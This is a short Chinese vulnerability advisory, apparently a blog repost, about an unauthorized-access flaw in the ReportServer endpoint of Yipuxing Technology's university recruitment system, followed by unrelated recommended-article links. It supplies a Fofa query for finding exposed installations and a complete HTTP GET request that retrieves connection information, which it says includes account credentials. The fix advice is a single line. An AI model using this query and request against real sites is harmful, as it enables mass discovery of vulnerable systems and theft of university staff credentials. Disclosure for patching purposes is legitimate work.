易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

复制代码
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
云境筑桃源哇6 分钟前
科勒珂灵挂墙式恒温花洒:以匠心科技铸就舒适卫浴新体验
科技
德迅云安全杨德俊29 分钟前
直面 DDoS 威胁:从现状到解决方案
网络·安全·web安全·https·ddos
2401_891655811 小时前
MySQL安全加固十大硬核操作技术大纲
数据库·mysql·安全
小陈工1 小时前
2026年3月22日技术资讯洞察:数据库优化进入预测时代,网络安全威胁全面升级
java·开发语言·数据库·python·安全·web安全·django
codervibe1 小时前
针对RuoYi 这个开源项目的各个方面
安全
学不完的1 小时前
Docker 的安全优化
运维·安全·docker·容器·eureka
CDN3602 小时前
各种网站高防服务器选型:360CDN 高防够用吗?
服务器·网络·安全
2501_933907212 小时前
本凡科技提供的宁波小程序开发服务全面解决方案
科技·微信小程序·小程序
Du_chong_huan2 小时前
1.6 面对攻击的网络 | 《计算机网络:自顶向下方法》精读版
网络·安全·php
科技林总2 小时前
如何安全地使用龙虾[特殊字符]
人工智能·安全